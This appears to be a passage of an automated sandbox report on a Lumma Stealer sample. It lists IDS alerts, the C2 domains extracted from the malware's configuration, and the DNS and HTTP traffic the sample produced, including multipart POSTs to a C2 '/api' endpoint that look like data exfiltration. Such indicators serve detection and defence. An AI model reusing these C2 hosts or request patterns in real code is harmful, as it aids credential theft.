            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 06702B10h0_2_024ABD27
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov eax, dword ptr [esi+1Ch]0_2_0247CD32
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx eax, di0_2_02495D87

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2058500 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat) : 192.168.2.3:50960 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2058492 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat) : 192.168.2.3:60721 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2058514 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat) : 192.168.2.3:50072 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2058484 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat) : 192.168.2.3:62975 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2058502 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat) : 192.168.2.3:56386 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2058510 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat) : 192.168.2.3:63788 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2058608 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enterwahsh .biz) : 192.168.2.3:56184 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2058480 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat) : 192.168.2.3:50835 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2058512 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat) : 192.168.2.3:57859 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.3:49745 -> 104.102.49.254:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.3:49762 -> 104.21.48.1:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.3:49762 -> 104.21.48.1:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.3:49773 -> 104.21.48.1:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.3:49754 -> 104.21.48.1:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.3:49754 -> 104.21.48.1:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.3:49811 -> 104.21.48.1:443
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: bashfulacid.lat
            Source: Malware configuration extractorURLs: enterwahsh.biz
            Source: Malware configuration extractorURLs: manyrestro.lat
            Source: Malware configuration extractorURLs: slipperyloo.lat
            Source: Malware configuration extractorURLs: talkynicer.lat
            Source: Malware configuration extractorURLs: shapestickyr.lat
            Source: Malware configuration extractorURLs: curverpluch.lat
            Source: Malware configuration extractorURLs: tentabatte.lat
            Source: Malware configuration extractorURLs: wordyfindy.lat
            Tries to resolve many domain names, but no domain seems valid
            Source: unknownDNS traffic detected: query: curverpluch.lat replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: manyrestro.lat replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: enterwahsh.biz replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: talkynicer.lat replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: 198.187.3.20.in-addr.arpa replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: slipperyloo.lat replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: 50.23.12.20.in-addr.arpa replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: tentabatte.lat replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: shapestickyr.lat replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: bashfulacid.lat replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: wordyfindy.lat replaycode: Name error (3)
            Source: global trafficTCP traffic: 192.168.2.3:57705 -> 162.159.36.2:53
            Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
            Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49762 -> 104.21.48.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49788 -> 104.21.48.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49773 -> 104.21.48.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49745 -> 104.102.49.254:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49799 -> 104.21.48.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49779 -> 104.21.48.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49805 -> 104.21.48.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49811 -> 104.21.48.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49754 -> 104.21.48.1:443
            Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: sputnik-1985.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HDIY54FQBZE5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12833Host: sputnik-1985.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9PRQ9RE77OAYR9AAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12105Host: sputnik-1985.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QYFZCQ13SE3ZZXLYUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20457Host: sputnik-1985.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=U797ZPLIWVP6J6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1213Host: sputnik-1985.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1NNI7LSHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1052Host: sputnik-1985.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: sputnik-1985.com
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
            Source: global trafficDNS traffic detected: DNS query: enterwahsh.biz
            Source: global trafficDNS traffic detected: DNS query: wordyfindy.lat
            Source: global trafficDNS traffic detected: DNS query: slipperyloo.lat
            Source: global trafficDNS traffic detected: DNS query: manyrestro.lat
            Source: global trafficDNS traffic detected: DNS query: shapestickyr.lat
            Source: global trafficDNS traffic detected: DNS query: talkynicer.lat
            Source: global trafficDNS traffic detected: DNS query: curverpluch.lat
            Source: global trafficDNS traffic detected: DNS query: tentabatte.lat
            Source: global trafficDNS traffic detected: DNS query: bashfulacid.lat
            Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
            Source: global trafficDNS traffic detected: DNS query: sputnik-1985.com
            Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
            Source: global trafficDNS traffic detected: DNS query: 50.23.12.20.in-addr.arpa
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
            Source: filename.exe, 00000000.00000003.1433939021.000000000304E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: filename.exe, 00000000.00000003.1433939021.000000000304E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: filename.exe, 00000000.00000003.1395750412.000000000097C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
            Source: filename.exe, 00000000.00000003.1433939021.000000000304E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: filename.exe, 00000000.00000003.1433939021.000000000304E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: filename.exe, 00000000.00000003.1433939021.000000000304E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: filename.exe, 00000000.00000003.1433939021.000000000304E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: filename.exe, 00000000.00000003.1433939021.000000000304E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: filename.exe, 00000000.00000003.1433939021.000000000304E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: filename.exe, 00000000.00000003.1433939021.000000000304E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
            Source: filename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
            Source: filename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
            Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
            Source: filename.exe, 00000000.00000003.1433939021.000000000304E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: filename.exe, 00000000.00000003.1433939021.000000000304E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: filename.exe, 00000000.00000003.1406975397.0000000003075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
            Source: filename.exe, 00000000.00000002.1532096286.0000000000916000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bashfulacid.lat/pi
            Source: filename.exe, 00000000.00000002.1532096286.0000000000916000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bashfulacid.lat/pic1
            Source: filename.exe, 00000000.00000003.1406975397.0000000003075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: filename.exe, 00000000.00000003.1406975397.0000000003075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: filename.exe, 00000000.00000003.1406975397.0000000003075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: filename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fas
            Source: filename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic
            Source: filename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=SCXpgixTDzt4&a
            Source: filename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
            Source: filename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
            Source: filename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modaP
            Source: filename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66
            Source: filename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
            Source: filename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
            Source: filename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
            Source: filename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A
            Source: filename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=aep8
            Source: filename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
            Source: filename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
            Source: filename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrE
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
            Source: filename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=VsdTzPa1YF_Y&l=e
            Source: filename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=en
            Source: filename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
            Source: filename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
            Source: filename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
            Source: filename.exe, 00000000.00000003.1406975397.0000000003075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: filename.exe, 00000000.00000003.1406975397.0000000003075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: filename.exe, 00000000.00000003.1406975397.0000000003075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
            Source: filename.exe, 00000000.00000003.1468927237.000000000097B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000002.1532096286.0000000000916000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1433413919.000000000097B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/
            Source: filename.exe, 00000000.00000003.1458208599.000000000097B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1468927237.000000000097B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com//
            Source: filename.exe, 00000000.00000002.1532096286.000000000097C000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1434347762.000000000097B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1446925420.000000000097B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395750412.000000000097C000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1458208599.000000000097B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1468927237.000000000097B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1433413919.000000000097B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/2L
            Source: filename.exe, 00000000.00000002.1532096286.000000000097C000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1434347762.000000000097B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1446925420.000000000097B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1458208599.000000000097B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1468927237.000000000097B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1433413919.000000000097B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/VL
            Source: filename.exe, 00000000.00000002.1532096286.000000000097C000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1468834713.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1459281538.00000000009B7000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395750412.000000000097C000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1458208599.000000000097B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1433398099.0000000003030000.00000004.00000800.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1447117075.0000000003034000.00000004.00000800.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1433378052.000000000302A000.00000004.00000800.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1468927237.000000000097B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1446895067.0000000003032000.00000004.00000800.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1433413919.000000000097B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000002.1532779820.0000000003014000.00000004.00000800.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1447162754.000000000303A000.00000004.00000800.00020000.00000000.sdmp, filename.exe, 00000000.00000002.1532336714.00000000009BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api
            Source: filename.exe, 00000000.00000003.1458208599.000000000097B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api%H
            Source: filename.exe, 00000000.00000003.1446925420.000000000097B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api.
            Source: filename.exe, 00000000.00000003.1395750412.000000000097C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apiDX
            Source: filename.exe, 00000000.00000003.1468834713.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1459281538.00000000009B7000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000002.1532336714.00000000009BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apiS
            Source: filename.exe, 00000000.00000003.1468864624.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apice
            Source: filename.exe, 00000000.00000003.1459281538.00000000009B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apif
            Source: filename.exe, 00000000.00000003.1458208599.000000000097B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apil
            Source: filename.exe, 00000000.00000003.1468864624.0000000003011000.00000004.00000800.00020000.00000000.sdmp, filename.exe, 00000000.00000002.1532779820.0000000003014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apip
            Source: filename.exe, 00000000.00000003.1395750412.000000000097C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apixO
            Source: filename.exe, 00000000.00000002.1532096286.0000000000945000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com:443/api
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
